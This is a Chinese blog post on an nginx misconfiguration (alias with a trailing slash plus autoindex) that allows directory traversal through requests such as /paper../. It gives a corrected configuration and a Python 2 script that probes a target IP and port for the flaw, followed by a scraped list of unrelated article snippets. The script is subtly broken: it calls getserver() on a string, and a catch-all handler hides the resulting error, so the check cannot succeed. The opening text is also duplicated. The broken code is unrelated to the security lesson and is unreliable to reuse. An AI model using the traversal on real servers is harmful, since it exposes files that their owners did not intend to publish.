Lucifer_wei
Lucifer_wei

nginx 配置错误目录遍历漏洞

nginx 是一款高性能的 web 服务器,使用非常广泛,其不仅经常被用作反向代理

在 nginx 中开启 autoindex,配置不规范而造成目录遍历漏洞

配置如下:

server { 
       listen 80; 
       server_name *.*.*.*; 
       index index.htm index.html; 
       root /home/wwwroot/www; 
       access_log off; 
       location /paper { 
               alias /home/wwwroot/paper/; 
               autoindex on; 
       } 
}

注意 这里 /home/wwwroot/paper/; 有个 /

当你浏览 http://*.*.*.*:80/paper/, 正常情况应该遍历 /home/wwwroot/paper/ 这个目录,但是如果访问 http://*.*.*.*:80/paper../, 这个的话就会遍历 /home/wwwroot/ 这个目录了 nginx 是一款高性能的 web 服务器,使用非常广泛,其不仅经常被用作反向代理

在 nginx 中开启 autoindex,配置不规范而造成目录遍历漏洞

配置如下:

server {
    listen    80;
    server_name *.*.*.*;
    index index.htm index.html;
    root  /home/wwwroot/www;
    access_log off;
    location /paper {
           alias /home/wwwroot/paper/;
           autoindex on;
       }
}

注意 这里 /home/wwwroot/paper/; 有个 /

当你浏览 http://*.*.*.*:80/paper/, 正常情况应该遍历 /home/wwwroot/paper/ 这个目录,但是如果访问 http://*.*.*.*:80/paper../, 这个的话就会遍历 /home/wwwroot/ 这个目录了 nginx (Tested at 1.1.10) sebug 建议:

使用如下配置:

location /paper {
        alias /home/wwwroot/paper; 
}

或:

location /paper/ {
        alias /home/wwwroot/paper/;
}

接下来介绍一个自己测试用到的检测脚本(用 Python 编写):

#!/usr/bin/env python
# -*- coding: utf_8 -*-
# nginx配置错误目录遍历漏洞
# Date: 2019-01-14
import sys
import urllib2
from lxml import etree


pocs = ['logs', 'test', 'paper']


def nginx_test(ip, port):
    try:
        for poc in pocs:
            try:
                res1 = urllib2.urlopen("http://" + ip + ":" + port + "/" + poc, timeout = 5)
                res_1 = res1.read()
                code1 = res1.getcode()
                server1 = res_1.getserver()
                cmp_str1 = 'Index of /' + poc + '/'
                html1 = etree.HTML(res_1)
                title1 = html1.xpath('//title')
                # print title1[0].text
                if code1 == 200 and cmp_str1 == title1[0].text:
                    res2 = urllib2.urlopen("http://" + ip + ":" + port + "/" + poc +"../", timeout = 3)
                    res_2 = res2.read()
                    code2 = res2.getcode()
                    cmp_str2 = 'Index of /' + poc + '../'
                    html2 = etree.HTML(res_2)
                    title2 = html2.xpath('//title')
                    # print title2[0].text
                    if code2 == 200 and cmp_str2 == title2[0].text and res_1 is not res_2:
                        print "True"
                        return True
            except Exception,e:
                print 'error:', e
                pass
        return False
    except Exception,e:
        print e
        return False

nginx_test("IP", "PORT")

你可能感兴趣的:(漏洞检测,nginx,安全,web安全)

  • C++ 线程安全之互斥锁 __雨夜星辰__ c++开发语言学习笔记visualstudio多线程
    目录线程安全1.原子性2.可见性3.顺序性互斥锁1.mutex类2.timed_mutex类3.recursive_mutex类4.lock_guard类线程安全线程安全是多线程编程是的计算机程序代码中的一个概念。在拥有共享数据的多条线程并行执行的程序中,线程安全的代码会通过同步机制保证各个线程都可以正常且准确的执行,不会出现数据污染等意外情况。上述是百度百科给出的一个概念解释。换言之,线程安全就
  • 计算机网络基础知识点简记 UV Youth 计算机网络网络
    OSI七层网络模型TCP/IP四层网络模型模型图解IP地址与子网划分基础概念IPV4与IPV6的区别子网划分的目的子网掩码的使用CIDR表示法路由器与交换机TCP与UDP协议HTTP与HTTPS协议DNS域名系统网络攻击与防御机制网络安全协议网络性能优化云计算基础
  • 以Python构建ONE FACE管理界面:从基础至进阶的实战探索 Allen_LVyingbo pythonpythonpyqt
    一、引言1.1研究背景与意义在人工智能技术蓬勃发展的当下,面部识别技术凭借其独特优势,于安防、金融、智能终端等众多领域广泛应用。在安防领域,可助力监控系统精准识别潜在威胁人员,提升公共安全保障水平;金融行业中,实现刷脸支付、远程开户等便捷服务,优化用户体验并强化交易安全。智能终端方面,为设备解锁、身份验证等功能提供支持,提升设备使用的便捷性与安全性。然而,现有面部识别系统在数据安全、检索效率及用户
  • NGINX 报错 413 Request Entity Too Large 解决方案 技术探索者 NGINXnginx
    1、问题原因用Nginx反向代理服务器,进行附件相关的操作时,当文件大小超过1M,会出现413RequestEntityTooLarge,这是由于nginx客户端默认的最大请求体是1M。2、解决方案通过修改Nginx配置文件的“client_max_body_size”属性来解决。nginx的默认配置文件是conf目录下的nginx.conf。注意:如果有自行扩展的配置文件可在nginx.conf
  • 明达云:赋能化工园区,智绘安全高效新蓝图 明达技术 物联网网络
    在日新月异的科技浪潮中,数字化转型已成为各行各业转型升级的关键驱动力。尤其在化工这一关乎国家经济命脉与安全环保的重要领域,如何实现智能化管理、提升运营效率、确保生产安全,成为了摆在众多化工园区面前的重大课题。在此背景下,明达云平台以其卓越的技术实力与深厚的行业经验,正逐步成为化工园区智慧化升级的首选伙伴。智慧监管,安全先行化工生产,安全为先。明达云平台通过集成物联网、大数据、人工智能等先进技术,为
  • 探索分布式IO模块的介质冗余:赋能工业自动化的稳健之心 明达技术 分布式自动化运维
    在日新月异的工业自动化领域,每一个细微环节的稳定性都直接关系到生产线的效率与安全。随着智能制造的深入发展,分布式IO(Input/Output)模块作为连接现场设备与控制系统的关键桥梁,其重要性日益凸显。我们自主研发的带有介质冗余功能的MR30分布式IO模块,正以其独特的优势,为工业自动化系统构建起一道坚不可摧的防护网。介质冗余:保障数据传输的“双保险”在传统工业自动化系统中,单一介质(如网线、光
  • CDN防御如何保护我们的网络安全? cdncdn缓存网络安全
    在当今数字化时代,网络安全成为了一个至关重要的议题。随着网络攻击的日益频繁和复杂化,企业和个人都面临着前所未有的安全威胁。内容分发网络(CDN)作为一种分布式网络架构,不仅能够提高网站的访问速度和用户体验,还能够在很大程度上增强网络安全防护能力。本文将探讨CDN防御如何保护我们的网络安全。1、CDN防御的首要本领是分布式抗DDoS攻击DDoS攻击,即分布式拒绝服务攻击,犹如网络中的“洪水猛兽”,攻
  • PHP基于Google Authenticator双因素身份验证实现动态码验证
    一:介绍GoogleAuthenticator双因素身份验证是谷歌推出的一款动态口令工具,解决大家各平台账户遭到恶意攻击的问题,一般在相关的服务平台登陆中除了用正常用户名和密码外,需要再输入一次谷歌认证器生成的动态口令才能验证成功,相当于输入二次密码,以达到账户的高安全性。二:拓展安装composerrequirehuaweichenai/google-authenticator三:使用1:创建密
  • Containerd 插件系统深度解析
    前言Containerd是一个工业级的容器运行时,其插件系统是其架构中最核心的部分之一。本文将深入解析containerd的插件机制,帮助读者理解其设计理念和实现原理。1.插件系统概述1.1设计目标模块化:将功能解耦为独立插件可扩展性:支持动态添加新功能类型安全:基于Go接口的类型检查依赖管理:自动处理插件间依赖关系1.2核心概念typeRegistrationstruct{TypeTypeIDs
  • 怎么做DNS污染检测 域名解析dnsdns劫持
    DNS污染是指通过恶意手段篡改DNS解析结果,导致用户访问错误或恶意网站的行为。这种行为不仅影响用户体验,还可能带来安全风险。以下是几种检测DNS污染的方法:1.使用在线DNS检查工具可以使用在线工具如帝恩思旗下的拨测在线DNS检测工具等来检查DNS设置和解析结果。这些工具会返回当前的DNS解析结果,从而判断是否存在异常。2.手动检查DNS解析结果通过命令行工具(如nslookup、dig)手动查
  • 网络安全常见十大漏洞总结(原理、危害、防御) 安全防护服务器安全加固服务器
    一、弱口令产生原因与个人习惯和安全意识相关,为了避免忘记密码,使用一个非常容易记住的密码,或者是直接采用系统的默认密码等。危害通过弱口令,攻击者可以进入后台修改资料,进入金融系统盗取钱财,进入OA系统可以获取企业内部资料,进入监控系统可以进行实时监控等等。防御设置密码通常遵循以下原则:(1)不使用空口令或系统缺省的口令,为典型的弱口令;(2)口令长度不小于8个字符;(3)口令不应该为连续的某个字符
  • 深入理解 SSH 端口转发:本地 vs 远程 vs 动态转发 X_taiyang18 ssh运维
    简介SSH端口转发(SSHPortForwarding)作为一种强大而灵活的技术,不仅可以帮助我们安全地访问远程服务,还能轻松突破网络限制。本文将带你深入了解SSH端口转发的原理、类型和实战应用。目录简介什么是SSH端口转发?主要特点:SSH端口转发的三种类型1.本地端口转发(LocalPortForwarding)️➡️1.1原理1.2使用场景1.3命令格式1.4示例2.远程端口转发(Remot
  • 深入理解视图的创建与删除:数据库管理中的高级功能
    title:深入理解视图的创建与删除:数据库管理中的高级功能date:2025/1/21updated:2025/1/21author:cmdragonexcerpt:在现代数据库管理系统中,视图是一个重要的高级功能,可以为用户提供定制化的数据视图以满足特定需求。视图不仅能够简化复杂的查询,还能增强数据安全性和访问效率。categories:前端开发tags:数据库视图创建视图删除视图数据库管理数
  • docker教程安装docker 爱吃蚂蚁的松鼠 dockerdockerkubernetes容器
    学习一个技术最重要的是学习一个技术的生态,用这些生态的相关知识点解决实际问题。docker实战docker拉取容器(nginx的坑等等)docker日志配置和DNS配置docker远程API调试(通过对接API来实现,打造自己的web运维工具)docker结合terraform自动化运维工具做自动化工作docker网络(网络流转原理和一些创建新环境来跟公司网络环境保持一致才能连接)docker高可
  • 【原创】开发部署中间件安装记录 liangrun521 java部署docker中间件dockerlinux
    文章目录1.docker安装1.1离线安装:X86架构的主机1.2离线安装:ARM64架构的主机1.3在线安装-系统CentOS1.3在线安装-系统Debian2.supervisor安装3.nginx安装4.rabbitmq-包含x-delayed-message5.nacos5.1docker部署5.2系统命令部署(单机)5.3定制jar包部署,supervisor托管,使用提供的压缩包操作6
  • 网络安全:信息时代的守护者 我是章汕呐 网络
    随着互联网的快速发展,网络安全问题日益成为全球关注的焦点。无论是个人用户、企业组织还是政府部门,网络安全都已成为保障信息安全、保护隐私、确保社会秩序的基石。在这个数字化时代,如何应对复杂多变的网络安全威胁,成为了我们共同的挑战。一、网络安全的现状与挑战网络安全是指通过各种技术手段、管理措施和策略,确保网络系统的稳定运行、数据传输的安全、信息资源的保密性以及用户隐私的保护。然而,随着技术的进步,网络
  • 基于 Python 的机器学习模型部署到 Flask Web 应用:从训练到部署的完整指南 m0_74825223 python机器学习flask
    目录引言技术栈步骤一:数据预处理步骤二:训练机器学习模型步骤三:创建FlaskWeb应用步骤四:测试Web应用步骤五:模型的保存与加载保存模型加载模型并在Flask中使用步骤六:Web应用的安全性考量示例:简单的输入验证示例:自定义错误处理示例:使用Flask-JWT-Extended进行认证结论参考资料引言在当今数据驱动的时代,机器学习模型已经广泛应用于各行各业,从金融、医疗到教育等领域。然而,
  • Nginx 负载均衡的实现 与君共勉12138 nginx负载均衡服务器运维
    1.机器准备客户端10.0.0.205nginx10.0.0.206web110.0.0.203web210.0.0.2042.nginx服务配置#下载nginx[root@ubuntu2204~]#aptinstallnginx-y#编辑配置文件,将请求分发到后端服务器[root@ubuntu2204~]#vim/etc/nginx/conf.d/load_balance.confupstrea
  • 围术期冠心病风险因子及综合管理方案研究报告 LCG元 围术期vue.js信息系统人工智能
    一、引言1.1研究背景与意义在医疗领域,手术治疗是许多疾病的重要干预手段,但围术期的风险因素一直是影响手术成功率和患者预后的关键问题。其中,冠心病作为一种常见的心血管疾病,其在围术期的风险因子对患者的生命安全构成了重大威胁。随着人口老龄化加剧以及手术适应证的不断拓宽,越来越多的冠心病患者需要接受手术治疗,这使得围术期冠心病风险的管理变得尤为重要。围术期冠心病风险的存在,不仅增加了手术的复杂性和难度
  • 全新发布:企业级安全网盘解决方案,助力数据高效流转与安全管理! c++代码诗人 信息安全开发语言c++
    全新发布:企业级安全网盘解决方案,助力数据高效流转与安全管理!在数字化办公快速发展的今天,信息安全与数据高效管理成为企业的核心需求。我们全新推出的企业级网盘系统,为您提供一站式解决方案,集稳定性、高安全性、多功能性于一体,助力您的企业高效运行和数据安全保障。以下是我们的网盘核心亮点:1.稳定可靠的技术架构客户端采用MFC开发:运行高效,界面直观,用户体验流畅,特别适合Windows系统用户。服务端
  • frp、花生壳、P2Link——常见内网穿透工具分析
    内网穿透工具能够帮助用户将内网服务映射到外网,使外部设备能够访问内网资源。本篇将对三款常用的内网穿透工具进行分析,FRP、花生壳和P2Link1.frp简介:frp(FastReverseProxy)是一个高性能的反向代理应用,主要用于内网穿透。它通过建立安全的隧道,使得外部设备能够访问内网服务。优点:开源免费:frp是开源项目,用户可以自由使用和修改。灵活性强:支持多种协议,可以满足不同场景的需
  • nginx实现负载均衡 新鑫S nginx负载均衡
    通过配置Nginx实现负载均衡,提高系统的可用性和容错性;分担流量,优化性能和响应速度;便捷地扩展后端服务器,支撑更高的并发;提升系统的安全性,保护后端服务器;灵活地配置负载均衡策略,满足不同需求。下载nginx文件可以参考nginx实现http转发。先打开nginx的配置文件nginx.conf,配置upstream块:在http块中添加一个upstream块,定义后端服务器池。Nginx会将请
  • [ vulhub漏洞复现篇 ] Apache Tomcat 文件包含漏洞 (CVE-2020-1938) _PowerShell 渗透测试自学篇[靶场实战]vulhubapachetomcatjava
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录博主介绍一、漏洞简介二、漏洞编号(选填)三、漏洞靶场(选填)1.vulhub靶场环境搭建2.切换到此靶场目录3.启动靶
  • nginx反向代理kafka集群实现内外网隔离访问 —— 筑梦之路 筑梦之路 linux系统运维大数据nginxkafka运维
    背景说明我们在使用Kafka客户端连接到Kafka集群时,即使连接的节点只配置了一个集群的Broker地址,该Broker将返回给客户端集群所有节点的信息列表。然后客户端使用该列表信息(Topic的分区信息)再与集群进行数据交互。这里Kafka列表信息为服务配置文件service.properties中advertised.listeners配置项中的信息。例如:advertised.listen
  • 基于国产鸿蒙系统的先进身份识别技术:原理、应用与实现 zrgkcard2024 harmonyos华为程序人生智能硬件
    基于国产鸿蒙系统的先进身份识别技术:原理、应用与实现在当今数字化转型加速的时代背景下,精准且高效的身份识别技术已成为众多领域实现智能化管理与安全保障的核心要素。本公司于身份证识别插件领域持续深耕,凭借深厚技术积累与创新研发能力,成功实现重大突破——全新推出适配国产鸿蒙系统的身份证及多证件识别解决方案,为身份识别技术应用开拓全新格局。一、技术核心原理与优势本身份证识别插件基于先进的NFC(近场通信)
  • AI未来趋势:AIGC浪潮下看AI训练师如何塑造智能未来(技术变革) 用心去追梦 前端htmlcss
    在AIGC(AIGeneratedContent,人工智能生成内容)浪潮下,AI训练师扮演着至关重要的角色,他们不仅推动了技术的发展,还在确保这些技术能够安全、高效地服务于社会方面发挥了重要作用。以下是AI训练师如何塑造智能未来的几个关键方面:1.技术变革与创新算法与模型训练预训练:通过大规模无标注数据的学习,构建具备基础语言理解和生成能力的基座模型。这一过程为后续更精细的任务打下了坚实的基础。指
  • 网络安全态势感知技术综述 哥坐11路 网络
    摘要:本文深入探讨网络安全态势感知技术,从其概念来源出发,详细阐述什么是网络安全态势感知,介绍态势感知的应用方向,并对华为的HiSecInsight与深信服的SIP两款典型产品进行剖析,旨在为相关领域人员提供全面且深入的技术认知。一、引言随着信息技术的飞速发展,网络安全问题日益复杂和严峻。网络安全态势感知作为应对这一挑战的关键技术,已成为保障网络空间安全的重要手段。二、网络安全态势感知的概念来源“
  • TypeScript语言的软件工程 编程小筑 包罗万象golang开发语言后端
    TypeScript语言的软件工程实践引言在现代软件工程中,编程语言的选择对项目的成功至关重要。近年来,JavaScript凭借其在Web开发中的广泛应用取得了巨大成功。然而,随着Web应用程序的复杂性不断增加,开发者渐渐发现纯JavaScript在可维护性、类型安全性和开发效率方面的不足。为了解决这些问题,TypeScript应运而生。TypeScript是一种由微软开发的开源语言,它在Java
  • 安全见闻二:Web程序构成与潜在漏洞 vortex5 星河飞雪安全见闻安全web安全网络安全前端
    内容预览≧∀≦ゞ安全见闻二:Web程序构成与潜在漏洞声明导语前端语言及潜在漏洞前端语言前端框架与代码库常见的前端框架与代码库安全问题的根源前端潜在漏洞后端语言及潜在漏洞常见后端语言协议问题后端潜在漏洞数据库及潜在漏洞数据库分类数据库潜在漏洞服务器程序及潜在漏洞常见服务器程序服务器程序潜在漏洞结语安全见闻二:Web程序构成与潜在漏洞声明学习视频来自B站UP主泷羽sec,如涉及侵权马上删除文章笔记的只
  • 域名怎么备案?域名备案流程及步骤 跨境商城搭建开发 githubphpjavahtml5vue.jspython
    一、什么是域名备案?域名备案,简单来说,就是将网站域名及相关信息提交给国家有关部门进行审核和管理,以确保网站的合法性和安全性。这一过程类似于给网站做一个实名认证,让网站具有合法的运营资质。二、域名备案的必要性域名备案不仅是国家法律法规的要求,也是保障网站安全、维护网络环境的重要举措。通过备案,可以有效打击非法网站,保护用户权益,提升互联网行业的整体规范水平。三、域名备案流程及步骤1.准备备案材料根
  • 插入表主键冲突做更新 a-john
    有以下场景: 用户下了一个订单,订单内的内容较多,且来自多表,首次下单的时候,内容可能会不全(部分内容不是必须,出现有些表根本就没有没有该订单的值)。在以后更改订单时,有些内容会更改,有些内容会新增。 问题: 如果在sql语句中执行update操作,在没有数据的表中会出错。如果在逻辑代码中先做查询,查询结果有做更新,没有做插入,这样会将代码复杂化。 解决: mysql中提供了一个sql语
  • Android xml资源文件中@、@android:type、@*、?、@+含义和区别 Cb123456 @+@?@*
    一.@代表引用资源 1.引用自定义资源。格式:@[package:]type/name android:text="@string/hello"   2.引用系统资源。格式:@android:type/name     android:textColor="@android:color/opaque_red"
  • 数据结构的基本介绍 天子之骄 数据结构散列表树、图线性结构价格标签
    数据结构的基本介绍 数据结构就是数据的组织形式,用一种提前设计好的框架去存取数据,以便更方便,高效的对数据进行增删查改。正确选择合适的数据结构,对软件程序的高效执行的影响作用不亚于算法的设计。此外,在计算机系统中数据结构的作用也是非同小可。例如常常在编程语言中听到的栈,堆等,就是经典的数据结构。   经典的数据结构大致如下:   一:线性数据结构 (1):列表 a
  • 通过二维码开放平台的API快速生成二维码 一炮送你回车库 api
     现在很多网站都有通过扫二维码用手机连接的功能,联图网(http://www.liantu.com/pingtai/)的二维码开放平台开放了一个生成二维码图片的Api,挺方便使用的。闲着无聊,写了个前台快速生成二维码的方法。        html代码如下:(二维码将生成在这div下) ? 1  &nbs
  • ImageIO读取一张图片改变大小 3213213333332132 javaIOimageBufferedImage
    package com.demo; import java.awt.image.BufferedImage; import java.io.File; import java.io.IOException; import javax.imageio.ImageIO; /** * @Description 读取一张图片改变大小 * @author FuJianyon
  • myeclipse集成svn(一针见血) 7454103 eclipseSVNMyEclipse
                                     &n
  • 装箱与拆箱----autoboxing和unboxing darkranger J2SE
    4.2 自动装箱和拆箱 基本数据(Primitive)类型的自动装箱(autoboxing)、拆箱(unboxing)是自J2SE 5.0开始提供的功能。虽然为您打包基本数据类型提供了方便,但提供方便的同时表示隐藏了细节,建议在能够区分基本数据类型与对象的差别时再使用。 4.2.1 autoboxing和unboxing 在Java中,所有要处理的东西几乎都是对象(Object)
  • ajax传统的方式制作ajax aijuans Ajax
    //这是前台的代码 <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+
  • 只用jre的eclipse是怎么编译java源文件的? avords javaeclipsejdktomcat
    eclipse只需要jre就可以运行开发java程序了,也能自动 编译java源代码,但是jre不是java的运行环境么,难道jre中也带有编译工具? 还是eclipse自己实现的?谁能给解释一下呢问题补充:假设系统中没有安装jdk or jre,只在eclipse的目录中有一个jre,那么eclipse会采用该jre,问题是eclipse照样可以编译java源文件,为什么呢? &nb
  • 前端模块化 bee1314 模块化
    背景: 前端JavaScript模块化,其实已经不是什么新鲜事了。但是很多的项目还没有真正的使用起来,还处于刀耕火种的野蛮生长阶段。   JavaScript一直缺乏有效的包管理机制,造成了大量的全局变量,大量的方法冲突。我们多么渴望有天能像Java(import),Python (import),Ruby(require)那样写代码。在没有包管理机制的年代,我们是怎么避免所
  • 处理百万级以上的数据处理 bijian1013 oraclesql数据库大数据查询
    一.处理百万级以上的数据提高查询速度的方法:        1.应尽量避免在 where 子句中使用!=或<>操作符,否则将引擎放弃使用索引而进行全表扫描。         2.对查询进行优化,应尽量避免全表扫描,首先应考虑在 where 及 o
  • mac 卸载 java 1.7 或更高版本 征客丶 javaOS
    卸载 java 1.7 或更高 sudo rm -rf /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin 成功执行此命令后,还可以执行 java 与 javac 命令 sudo rm -rf /Library/PreferencePanes/JavaControlPanel.prefPane 成功执行此命令后,还可以执行 java
  • 【Spark六十一】Spark Streaming结合Flume、Kafka进行日志分析 bit1129 Stream
    第一步,Flume和Kakfa对接,Flume抓取日志,写到Kafka中 第二部,Spark Streaming读取Kafka中的数据,进行实时分析   本文首先使用Kakfa自带的消息处理(脚本)来获取消息,走通Flume和Kafka的对接 1. Flume配置 1. 下载Flume和Kafka集成的插件,下载地址:https://github.com/beyondj2ee/f
  • Erlang vs TNSDL bookjovi erlang
          TNSDL是Nokia内部用于开发电信交换软件的私有语言,是在SDL语言的基础上加以修改而成,TNSDL需翻译成C语言得以编译执行,TNSDL语言中实现了异步并行的特点,当然要完整实现异步并行还需要运行时动态库的支持,异步并行类似于Erlang的process(轻量级进程),TNSDL中则称之为hand,Erlang是基于vm(beam)开发,
  • 非常希望有一个预防疲劳的java软件, 预防过劳死和眼睛疲劳,大家一起努力搞一个 ljy325 企业应用
     非常希望有一个预防疲劳的java软件,我看新闻和网站,国防科技大学的科学家累死了,太疲劳,老是加班,不休息,经常吃药,吃药根本就没用,根本原因是疲劳过度。我以前做java,那会公司垃圾,老想赶快学习到东西跳槽离开,搞得超负荷,不明理。深圳做软件开发经常累死人,总有不明理的人,有个软件提醒限制很好,可以挽救很多人的生命。 相关新闻: (1)IT行业成五大疾病重灾区:过劳死平均37.9岁
  • 读《研磨设计模式》-代码笔记-原型模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * Effective Java 建议使用copy constructor or copy factory来代替clone()方法: * 1.public Product copy(Product p){} * 2.publi
  • 配置管理---svn工具之权限配置 chenyu19891124 SVN
    今天花了大半天的功夫,终于弄懂svn权限配置。下面是今天收获的战绩。 安装完svn后就是在svn中建立版本库,比如我本地的是版本库路径是C:\Repositories\pepos。pepos是我的版本库。在pepos的目录结构 pepos    component    webapps 在conf里面的auth里赋予的权限配置为 [groups]
  • 浅谈程序员的数学修养 comsci 设计模式编程算法面试招聘
                                     浅谈程序员的数学修养
  • 批量执行 bulk collect与forall用法 daizj oraclesqlbulk collectforall
    BULK COLLECT 子句会批量检索结果,即一次性将结果集绑定到一个集合变量中,并从SQL引擎发送到PL/SQL引擎。通常可以在SELECT INTO、 FETCH INTO以及RETURNING INTO子句中使用BULK COLLECT。本文将逐一描述BULK COLLECT在这几种情形下的用法。     有关FORALL语句的用法请参考:批量SQL之 F
  • Linux下使用rsync最快速删除海量文件的方法 dongwei_6688 OS
    1、先安装rsync:yum install rsync 2、建立一个空的文件夹:mkdir /tmp/test 3、用rsync删除目标目录:rsync --delete-before -a -H -v --progress --stats /tmp/test/ log/这样我们要删除的log目录就会被清空了,删除的速度会非常快。rsync实际上用的是替换原理,处理数十万个文件也是秒删。
  • Yii CModel中rules验证规格 dcj3sjt126com rulesyiivalidate
    Yii cValidator主要用法分析:  yii验证rulesit 分类: Yii yii的rules验证 cValidator主要属性 attributes ,builtInValidators,enableClientValidation,message,on,safe,skipOnError  
  • 基于vagrant的redis主从实验 dcj3sjt126com vagrant
    平台: Mac 工具: Vagrant 系统: Centos6.5 实验目的: Redis主从   实现思路 制作一个基于sentos6.5, 已经安装好reids的box, 添加一个脚本配置从机, 然后作为后面主机从机的基础box   制作sentos6.5+redis的box   mkdir vagrant_redis cd vagrant_
  • Memcached(二)、Centos安装Memcached服务器 frank1234 centosmemcached
    一、安装gcc rpm和yum安装memcached服务器连接没有找到,所以我使用的是make的方式安装,由于make依赖于gcc,所以要先安装gcc 开始安装,命令如下,[color=red][b]顺序一定不能出错[/b][/color]: 建议可以先切换到root用户,不然可能会遇到权限问题:su root 输入密码...... rpm -ivh kernel-head
  • Remove Duplicates from Sorted List hcx2013 remove
    Given a sorted linked list, delete all duplicates such that each element appear only once. For example,Given 1->1->2, return 1->2.Given 1->1->2->3->3, return&
  • Spring4新特性——JSR310日期时间API的支持 jinnianshilongnian spring4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • 浅谈enum与单例设计模式 247687009 java单例
    在JDK1.5之前的单例实现方式有两种(懒汉式和饿汉式并无设计上的区别故看做一种),两者同是私有构 造器,导出静态成员变量,以便调用者访问。 第一种 package singleton; public class Singleton { //导出全局成员 public final static Singleton INSTANCE = new S
  • 使用switch条件语句需要注意的几点 openwrt cbreakswitch
    1. 当满足条件的case中没有break,程序将依次执行其后的每种条件(包括default)直到遇到break跳出 int main() { int n = 1; switch(n) { case 1: printf("--1--\n"); default: printf("defa
  • 配置Spring Mybatis JUnit测试环境的应用上下文 schnell18 springmybatisJUnit
    Spring-test模块中的应用上下文和web及spring boot的有很大差异。主要试下来差异有: 单元测试的app context不支持从外部properties文件注入属性 @Value注解不能解析带通配符的路径字符串 解决第一个问题可以配置一个PropertyPlaceholderConfigurer的bean。 第二个问题的具体实例是:    
  • Java 定时任务总结一 tuoni javaspringtimerquartztimertask
     Java定时任务总结  一.从技术上分类大概分为以下三种方式:  1.Java自带的java.util.Timer类,这个类允许你调度一个java.util.TimerTask任务;   说明:    java.util.Timer定时器,实际上是个线程,定时执行TimerTask类 &
  • 一种防止用户生成内容站点出现商业广告以及非法有害等垃圾信息的方法 yangshangchuan rank相似度计算文本相似度词袋模型余弦相似度
    本文描述了一种在ITEYE博客频道上面出现的新型的商业广告形式及其应对方法,对于其他的用户生成内容站点类型也具有同样的适用性。   最近在ITEYE博客频道上面出现了一种新型的商业广告形式,方法如下:     1、注册多个账号(一般10个以上)。     2、从多个账号中选择一个账号,发表1-2篇博文
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他